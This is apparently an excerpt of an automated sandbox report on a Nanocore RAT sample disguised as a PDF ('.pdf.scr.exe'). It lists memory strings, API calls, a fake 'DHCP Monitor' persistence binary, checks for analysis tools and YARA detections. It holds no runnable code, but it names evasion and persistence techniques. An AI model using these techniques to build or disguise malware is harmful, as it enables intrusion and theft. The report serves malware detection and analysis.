      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: updatewindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: updatewindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mapwindowpoints
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copyrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: mapwindowpointsucopyrect
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadcursorw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadcursorw|
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sendmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: sendmessagew!
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdce
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: releasedc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: messageboxw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: findwindowexw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclassnamew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: copyimage
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getclassnamewtcopyimage5
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wvsprintfw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: wvsprintfw]
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: translatemessage
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dispatchmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dispatchmessagew3
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: peekmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: peekmessagew6
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: postmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: postmessagew&
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: waitforinputidle
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: iswindowvisible
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: dialogboxparamw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enddialog
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: enddialog*
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitemtextw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdlgitemtextws
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: senddlgitemmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setfocus
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setforegroundwindow
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: setforegroundwindow{
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getsyscolor
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadbitmapw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: loadiconw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: destroyicon
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: isdialogmessagew
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createcompatiblebitmap
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createcompatibledc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: isdialogmessagew/createcompatiblebitmap0createcompatibledc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deletedc
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: deleteobject
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdevicecaps
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: getdevicecapsw
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: selectobject
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: stretchblt
      Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: createdibsection
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00371A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00313312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0037EBB3 mouse_event,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_00371EF3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_003713F2 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
      Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.0000000007382000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000000.358747295.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
      Source: RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.0000000003872000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerH
      Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager&
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.586667731.00000000075DC000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: itugx.exeBinary or memory string: Shell_TrayWnd
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003BC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager8W
      Source: itugx.exe, 00000005.00000003.451315387.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452100532.0000000001510000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451193951.00000000014F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerm,
      Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managera
      Source: itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then
      Source: itugx.exe, 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462582507.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: inGetText("Program Manager") = "0" Then
      Source: rnnsh.xls.0.drBinary or memory string: If WinGetText("Program Manager") = "0" Then
      Source: RegSvcs.exe, 00000003.00000002.580107208.00000000038EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager\2
      Source: itugx.exe, 00000017.00000003.535781769.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.534401259.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000017.00000003.539266088.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager*;
      Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If WinGetText("Program Manager") = "0" Then$
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003802000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerD$Fp
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: GetLocaleInfoW,GetNumberFormatW,
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegSvcs.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDF654 cpuid
      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CDDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0034BCF2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,
      Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exeCode function: 2_2_0036E5F8 GetUserNameW,
      Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exeCode function: 0_2_00CCB146 GetVersionExW,
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
      Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regshot.exe

      Stealing of Sensitive Information

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPE
